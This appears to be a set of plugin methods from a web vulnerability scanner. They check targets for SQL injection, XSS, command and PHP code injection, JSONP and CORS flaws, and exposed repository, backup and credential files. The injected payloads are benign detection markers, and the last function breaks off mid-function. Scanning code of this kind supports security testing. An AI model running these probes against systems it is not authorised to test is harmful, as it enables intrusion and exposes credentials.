def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
combine = '^\S+\(\{.*\}\)'
if re.match(combine, resp_str, re.I | re.S):
# 判断是否为jsonp
if "Referer" in headers:
headers["Referer"] = "https://www.baidu.com/q=" + url
if method == 'GET':
r = requests.get(url, headers=headers)
if GetRatio(resp_str, r.text) >= 0.8:
out.success(url, self.name)
elif re.match(JSON_RECOGNITION_REGEX, resp_str,
re.I | re.S) and 'callback' not in url:
# 不是jsonp,是json
if "Referer" in headers:
headers["Referer"] = "https://www.baidu.com/q=" + url
params["callback"] = random_str(2)
if method == 'GET':
r = requests.get(netloc, params=params, headers=headers)
if params["callback"] + "({" in r.text:
out.success(r.url, self.name)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
domain = "{}://{}/".format(p.scheme, p.netloc)
if "/wp-content/themes/" not in resp_str:
return
url_lst = [
'/wp-config.php.inc', '/wp-config.inc', '/wp-config.bak',
'/wp-config.php~', '/.wp-config.php.swp', '/wp-config.php.bak'
]
for payload in url_lst:
test_url = domain.rstrip('/') + payload
r = requests.get(test_url, headers=headers)
if r.status_code == 200 and '<?php' in r.text:
out.success(test_url, self.name)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
if "Warning" in resp_str and "array given" in resp_str:
out.success(url, self.name)
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
del data[k]
data[k + "[]"] = v
try:
_ = prepare_url(netloc, params=data)
r = requests.get(_, headers=headers)
if "Warning" in r.text and "array given" in r.text:
out.success(_, self.name)
except:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
post_hint = self.requests.post_hint
post_data = self.requests.post_data
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'POST':
if post_hint == POST_HINT.NORMAL:
for k, v in post_data.items():
if k.lower() in ignoreParams:
continue
rndStr = 9000 + random.randint(1, 999)
payload = "<img/src=xyz OnErRor=alert(" + str(
rndStr) + ")>"
data = copy.deepcopy(post_data)
data[k] = v + payload
r = requests.post(url, headers=headers, data=data)
html = r.text
if payload in html:
out.success(url,
self.name,
payload="{}={}".format(k, data[k]),
data=str(data),
raw=r.raw)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode()
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
combine = '^\S+\(\{.*\}\)'
if re.match(combine, resp_str, re.I | re.S):
if "Referer" in headers:
del headers["Referer"]
if method == 'GET':
r = requests.get(url, headers=headers)
if GetRatio(resp_str, r.text) >= 0.8:
out.success(url, self.name)
elif method == 'POST':
r = requests.post(url, headers=headers, data=data)
if GetRatio(resp_str, r.text) >= 0.8:
out.success(url, self.name, payload=str(data))
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
domain = "{}://{}/".format(p.scheme, p.netloc) + random_str(6) + ".jsp"
re_list = {
"ASPNETPathDisclosure":
"<title>Invalid\sfile\sname\sfor\smonitoring:\s'([^']*)'\.\sFile\snames\sfor\smonitoring\smust\shave\sabsolute\spaths\,\sand\sno\swildcards\.<\/title>",
"Struts2DevMod":
"You are seeing this page because development mode is enabled. Development mode, or devMode, enables extra",
"Django DEBUG MODEL":
"You're seeing this error because you have <code>DEBUG = True<\/code> in",
"RailsDevMode":
"<title>Action Controller: Exception caught<\/title>",
"RequiredParameter":
"Required\s\w+\sparameter\s'([^']+?)'\sis\snot\spresent"
}
r = requests.get(domain, headers=headers)
for k, v in re_list.items():
if re.search(v, r.text, re.S | re.I):
out.success(domain, self.name, name=k)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
path1 = get_parent_paths(url)
urls = set(path1)
for link in get_links(resp_str, url, True):
path1 = get_parent_paths(link)
urls |= set(path1)
flag_list = [
"directory listing for",
"<title>directory",
"<head><title>index of",
'<table summary="directory listing"',
'last modified</a>',
]
for p in urls:
if not Share.in_url(p):
Share.add_url(p)
try:
r = requests.get(p, headers=headers)
for i in flag_list:
if i in r.text.lower():
out.success(p, self.name)
break
except Exception as e:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
payloads = self.generate()
for payload in payloads:
test_url = url.rstrip('/') + payload["path"]
r = requests.get(test_url, headers=headers)
if r.status_code != 200:
continue
if payload["tag"]:
if payload["tag"] not in r.text:
continue
if payload["content-type"]:
if payload['content-type'] not in r.headers.get(
'Content-Type', ''):
continue
if payload["content-type_no"]:
if payload["content-type_no"] in r.headers.get(
'Content-Type', ''):
continue
out.success(test_url, self.name)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
variants = [
"/sftp-config.json",
"/recentservers.xml"
]
for f in variants:
_ = url.rstrip('/') + f
try:
r = requests.get(_, headers=headers)
if re.search(r'("type":[\s\S]*?"host":[\s\S]*?"user":[\s\S]*?"password":[\s\S]*")', r.text,
re.I | re.S | re.M):
out.success(_, self.name)
elif re.search(r'(<Pass>[\s\S]*?<\/Pass>)', r.text, re.I):
out.success(_, self.name)
except Exception as e:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
variants = [
"phpinfo.php",
"pi.php",
"php.php",
"i.php",
"test.php",
"temp.php",
"info.php",
]
for phpinfo in variants:
testURL = url.strip('/') + "/" + phpinfo
r = requests.get(testURL, headers=headers)
if "<title>phpinfo()</title>" in r.text:
info = get_phpinfo(r.text)
out.success(testURL, self.name, info=info)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
flag = {
"/.svn/all-wcprops": "svn:wc:ra_dav:version-url",
"/.git/config": 'repositoryformatversion[\s\S]*',
"/.bzr/README": 'This\sis\sa\sBazaar[\s\S]',
'/CVS/Root': ':pserver:[\s\S]*?:[\s\S]*',
'/.hg/requires': '^revlogv1.*'
}
for f in flag.keys():
_ = url.rstrip('/') + f
try:
r = requests.get(_, headers=headers)
if re.search(flag[f], r.text, re.I | re.S | re.M):
out.success(_, self.name)
except Exception as e:
pass
def _javascript_redirect(self, response: requests.Response):
"""
Test for JavaScript redirects, these are some common redirects:
// These also work without the `window.` at the beginning
window.location = "http://www.w3af.org/";
window.location.href = "http://www.w3af.org/";
window.location.replace("http://www.w3af.org");
window.location.assign('http://www.w3af.org');
self.location = 'http://www.w3af.org';
top.location = 'http://www.w3af.org';
// jQuery
$(location).attr('href', 'http://www.w3af.org');
$(window).attr('location', 'http://www.w3af.org');
$(location).prop('href', 'http://www.w3af.org');
// Only for old IE
window.navigate('http://www.w3af.org');
"""
for statement in self._extract_script_code(response):
if self.test_domain not in statement:
continue
out.success(self.uri,
self.name,
msg="当前JavaScript脚本发现被注入url,在 {}".format(statement))
return False
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
domain = "{}://{}/".format(p.scheme, p.netloc)
payloads = parse_tld(domain, fix_protocol=True, fail_silently=True)
if not payloads:
return
for payload in payloads:
for i in ['.rar', '.zip']:
test_url = domain + payload + i
r = requests.get(test_url, headers=headers, allow_redirects=False, stream=True)
content = r.raw2.read(10)
if r.status_code == 200 and self._check(content):
rarsize = int(r.headers.get('Content-Length')) // 1024 // 1024
out.success(test_url, self.name, size="{}M".format(rarsize))
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
combine = '^\S+\(\{.*\}\)'
domain = "{}://{}".format(p.scheme, p.netloc) + random_str(
2, string.ascii_lowercase + string.digits) + p.netloc + "/"
if re.match(combine, resp_str, re.I | re.S):
# 判断是否为jsonp
headers["Referer"] = domain
if method == 'GET':
r = requests.get(url, headers=headers)
if GetRatio(resp_str, r.text) >= 0.8:
out.success(url, self.name, raw=r.raw)
elif re.match(JSON_RECOGNITION_REGEX, resp_str,
re.I | re.S) and 'callback' not in url:
# 不是jsonp,是json
headers["Referer"] = domain
params["callback"] = random_str(2)
if method == 'GET':
r = requests.get(netloc, params=params, headers=headers)
if params["callback"] + "({" in r.text:
out.success(r.url, self.name, raw=r.raw)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode(errors='ignore')
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
sensitive_params = [
'mail', 'user', 'name', 'ip', 'pass', 'add', 'phone'
]
if "access-control-allow-origin" in resp_headers and resp_headers[
"access-control-allow-origin"] == "*":
if "access-control-allow-credentials" in resp_headers and resp_headers[
"access-control-allow-credentials"].lower() == 'true':
out.success(url, self.name, payload=str(data), method=method)
else:
for i in sensitive_params:
if i in resp_str:
out.success(url,
self.name,
sensitive=i,
method=method,
payload=str(data))
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
path1 = get_parent_paths(url)
urls = set(path1)
for link in get_links(resp_str, url, True):
path1 = get_parent_paths(link)
urls |= set(path1)
flag = {
"/.svn/all-wcprops": "svn:wc:ra_dav:version-url",
"/.git/config": 'repositoryformatversion'
}
for p in urls:
for f in flag.keys():
_ = p.rstrip('/') + f
if not Share.in_url(_):
Share.add_url(_)
try:
r = requests.get(_, headers=headers)
# out.log(_)
if flag[f] in r.text:
out.success(_, self.name)
except Exception as e:
pass
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
if method == 'GET':
# 从源码中获取更多链接
links = [url]
for link in set(links):
# 只接收指定类型的SQL注入
p = urlparse(link)
if p.query == '':
continue
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
continue
params = dict()
for i in p.query.split("&"):
try:
key, value = i.split("=")
params[key] = value
except ValueError:
pass
netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)
for k, v in params.items():
if k.lower() in ignoreParams:
continue
if not re.search('^-?\d+(\.\d+)?$', v):
continue
data = copy.deepcopy(params)
# 判断条件:
# 1. -randint !== origin
# 2. +randint-randint == origin
payload1 = "{0}+{1}".format(v, random.randint(10, 100))
data[k] = payload1
url1 = prepare_url(netloc, params=data)
if Share.in_url(url1):
continue
Share.add_url(url1)
r = requests.get(url1, headers=headers)
html1 = r.text
if fuzzy_equal(resp_str, html1, 0.97):
continue
payload2 = "{0}+{1}-{1}".format(v, random.randint(10, 100))
data[k] = payload2
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
if fuzzy_equal(resp_str, html2, 0.8):
msg = " {k}:{v} !== {k}:{v1} and {k}:{v} === {k}:{v2}".format(
k=k, v=v, v1=payload1, v2=payload2)
# out.log(msg)
out.success(link, self.name, payload=k, condition=msg)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
combine = '^\S+\(\{.*?\}\)'
domain = "{}://{}".format(p.scheme, p.netloc) + random_str(
4, string.ascii_lowercase + string.digits) + ".com/"
sensitive_params = [
'mail', 'user', 'name', 'ip', 'pass', 'add', 'phone'
]
if re.match(combine, resp_str, re.I | re.S):
# 判断是否为jsonp
headers["Referer"] = domain
if method == 'GET':
r = requests.get(url, headers=headers)
if GetRatio(resp_str, r.text) >= 0.8:
for i in sensitive_params:
if i in r.text.lower():
res = {
"Referer": domain,
"keyword": i,
"Content-Type":
r.headers.get("Content-Type", "")
}
response = self.jsonp_load(r.text)
if response:
res["response"] = response
if len(response) > 500:
res["response"] = "数据太多,自行访问"
out.success(url, self.name, **res)
elif re.match(JSON_RECOGNITION_REGEX, resp_str,
re.I | re.S) and 'callback' not in url:
# 不是jsonp,是json
headers["Referer"] = domain
params["callback"] = random_str(2)
if method == 'GET':
r = requests.get(netloc, params=params, headers=headers)
if r.text.startswith(params["callback"] + "({"):
res = {
"Referer": domain,
"Content-Type": r.headers.get("Content-Type", ""),
"callback": params["callback"],
}
response = self.jsonp_load(r.text)
if response:
res["response"] = response
if len(response) > 500:
res["response"] = "数据太多,自行访问"
out.success(r.url, self.name, **res)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
# 从源码中获取更多链接
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
sql_flag = [
"/**/and'{0}'='{1}'",
"'and'{0}'='{1}",
'"and"{0}"="{1}',
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for flag in sql_flag:
# true page
rand_str = random_str(2)
payload1 = v + flag.format(rand_str, rand_str)
data[k] = payload1
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
radio = GetRatio(resp_str, html1)
if radio < 0.88:
continue
# false page
payload2 = v + flag.format(random_str(2), random_str(2))
data[k] = payload2
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
radio = GetRatio(resp_str, html2)
if radio < 0.78:
msg = "{k}:{v} === {k}:{v1} and {k}:{v} !== {k}:{v2}".format(
k=k, v=v, v1=payload1, v2=payload2)
# out.log(msg)
out.success(url,
self.name,
payload=k,
condition=msg,
raw=[r.raw, r2.raw])
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
post_hint = self.requests.post_hint
post_data = self.requests.post_data
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'POST':
if post_hint == POST_HINT.NORMAL:
sql_flag = [
"/**/and'{0}'='{1}'",
"'and'{0}'='{1}",
'"and"{0}"="{1}',
]
for k, v in post_data.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(post_data)
for flag in sql_flag:
# true page
rand_str = random_str(2)
payload1 = v + flag.format(rand_str, rand_str)
data[k] = payload1
r = requests.post(url, data=data, headers=headers)
html1 = r.text
radio = GetRatio(resp_str, html1)
if radio < 0.88:
continue
# false page
payload2 = v + flag.format(random_str(2), random_str(2))
data[k] = payload2
r2 = requests.post(url, data=data, headers=headers)
html2 = r2.text
radio2 = GetRatio(resp_str, html2)
if radio < 0.78:
condition = [
'{k}:{v} 与原页面 {k}:{v1} 的相似度{radio} 页面大小:{size1}'.format(k=k, v=payload1, v1=v,
radio=radio,
size1=len(html1)),
'{k}:{v} 与原页面 {k}:{v1} 的相似度{radio} 页面大小:{size2}'.format(k=k, v=payload2, v1=v,
radio=radio2,
size2=len(html2))
]
# out.log(msg)
out.success(url, self.name, payload=k, condition=condition, data=str(data),
raw=[r.raw, r2.raw])
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
# cookie
sql_flag = '鎈\'"\('
if headers and "cookie" in headers:
cookies = paramToDict(headers["cookie"], place=PLACE.COOKIE)
del headers["cookie"]
if cookies:
for k, v in cookies.items():
cookie = copy.deepcopy(cookies)
cookie[k] = v + sql_flag
r = requests.get(url, headers, cookies=urlencode(cookie))
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(r.text)
if match:
out.success(url,
self.name,
payload="cookie: {}={}".format(
k, cookie[k]),
dbms_type=dbms_type,
raw=r.raw)
break
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
data[k] = v + sql_flag
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
out.success(url,
self.name,
payload="{}={}".format(k, data[k]),
dbms_type=dbms_type,
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
sql_flag = [
"'and(select+sleep({time})union/**/select+1)='",
'"and(select+sleep({time})union/**/select+1)="',
'/**/and(select+sleep({time})union/**/select+1)'
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for flag in sql_flag:
# first request
payload1 = flag.format(time=0)
data[k] = v + payload1
url1 = prepare_url(netloc, params=data)
_ = time.time()
r = requests.get(url1, headers=headers)
html1 = r.text
elapsed = time.time() - _
# second request
payload2 = flag.format(time=2)
data[k] = v + payload2
_ = time.time()
r2 = requests.get(netloc, params=data, headers=headers)
html2 = r2.text
elapsed2 = time.time() - _
if elapsed2 - elapsed > 1.5:
msg = " {k}:{v1} 耗时 {time1}s; {k}:{v2} 耗时 {time2}s".format(
k=k,
v1=payload1,
v2=payload2,
time1=elapsed,
time2=elapsed2)
# out.log(msg)
out.success(url, self.name, payload=k, condition=msg)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
post_hint = self.requests.post_hint
post_data = self.requests.post_data
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'POST':
if post_hint == POST_HINT.NORMAL:
randint = random.randint(1000, 9000)
url_flag = {
"set|set&set": [
'Path=[\s\S]*?PWD=', 'Path=[\s\S]*?PATHEXT=',
'Path=[\s\S]*?SHELL=', 'Path\x3d[\s\S]*?PWD\x3d',
'Path\x3d[\s\S]*?PATHEXT\x3d',
'Path\x3d[\s\S]*?SHELL\x3d',
'SERVER_SIGNATURE=[\s\S]*?SERVER_SOFTWARE=',
'SERVER_SIGNATURE\x3d[\s\S]*?SERVER_SOFTWARE\x3d',
'Non-authoritative\sanswer:\s+Name:\s*',
'Server:\s*.*?\nAddress:\s*'
],
"echo `echo 6162983|base64`6162983".format(randint):
["NjE2Mjk4Mwo=6162983"]
}
for k, v in post_data.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(post_data)
for spli in ['', ';']:
for flag, re_list in url_flag.items():
if spli == "":
data[k] = flag
else:
data[k] = v + spli + flag
r = requests.post(url, data=data, headers=headers)
html1 = r.text
for rule in re_list:
if re.search(rule, html1, re.I | re.S | re.M):
out.success(url,
self.name,
payload="{}:{}".format(
k, data[k]),
method=method,
data=str(data),
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
post_hint = self.requests.post_hint
post_data = self.requests.post_data
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'POST':
regx = 'Parse error: syntax error,.*?\sin\s'
randint = random.randint(1, 256)
verify_result = md5(str(randint).encode())
payloads = [
"print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='",
"\";print(md5({}));$a=\"", "${{@print(md5({}))}}",
"${{@print(md5({}))}}\\"
]
if post_hint == POST_HINT.NORMAL:
for k, v in post_data.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(post_data)
for payload in payloads:
if payload[0] == "p":
data[k] = payload.format(randint)
else:
data[k] = v + payload.format(randint)
r = requests.post(url, data=data, headers=headers)
html1 = r.text
if verify_result in html1:
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]),
method=method,
data=str(data),
raw=r.raw)
break
if re.search(regx, html1, re.I | re.S | re.M):
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]),
method=method,
data=str(data),
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
regx = 'Parse error: syntax error,.*?\sin\s'
randint = random.randint(1, 256)
verify_result = md5(str(randint).encode())
payloads = [
"print(md5({}));", ";print(md5({}));", "';print(md5({}));$a='",
"\";print(md5({}));$a=\"", "${{@print(md5({}))}}",
"${{@print(md5({}))}}\\"
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for payload in payloads:
if payload[0] == "p":
data[k] = payload.format(randint)
else:
data[k] = v + payload.format(randint)
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
if verify_result in html1:
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]))
break
if re.search(regx, html1, re.I | re.S | re.M):
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]))
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
payloads = self.generate()
success = []
for payload in payloads:
test_url = url.rstrip('/') + payload["path"]
r = requests.get(test_url, headers=headers, allow_redirects=False)
if r.status_code != 200:
continue
if payload["tag"]:
if payload["tag"] not in r.text:
continue
if payload["content-type"]:
if payload['content-type'] not in r.headers.get(
'Content-Type', ''):
continue
if payload["content-type_no"]:
if payload["content-type_no"] in r.headers.get(
'Content-Type', ''):
continue
success.append({"url": test_url, "len": len(r.text)})
if success:
if len(success) < 10:
for i in success:
out.success(i["url"], self.name)
else:
result = {}
for item in success:
length = item.get("len", 0)
if length not in result:
result[length] = list()
result[length].append(item["url"])
for k, v in result.items():
if len(v) > 5:
continue
else:
for i in v:
out.success(i, self.name)
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
if method == 'GET':
# 从源码中获取更多链接
links = get_links(resp_str, url, True)
links.append(url)
for link in set(links):
# 只接收指定类型的SQL注入
p = urlparse(link)
if p.query == '':
continue
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
continue
params = dict()
for i in p.query.split("&"):
try:
key, value = i.split("=")
params[key] = value
except ValueError:
pass
netloc = "{}://{}{}".format(p.scheme, p.netloc, p.path)
sql_flag = '鎈\'"\('
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
data[k] = v + sql_flag
url1 = prepare_url(netloc, params=data)
if Share.in_url(url1):
continue
Share.add_url(url1)
r = requests.get(url1, headers=headers)
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
out.success(link,
self.name,
payload="{}={}".format(k, data[k]))
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
randint1 = random.randint(100, 900)
randint2 = random.randint(100, 900)
randstr = random_str(4)
payloads = {
"{ranstr}${{{int1}*{int2}}}{ranstr}".format(ranstr=randstr,
int1=randint1,
int2=randint2),
"{ranstr}#{{{int1}*{int2}}}{ranstr}".format(ranstr=randstr,
int1=randint1,
int2=randint2)
}
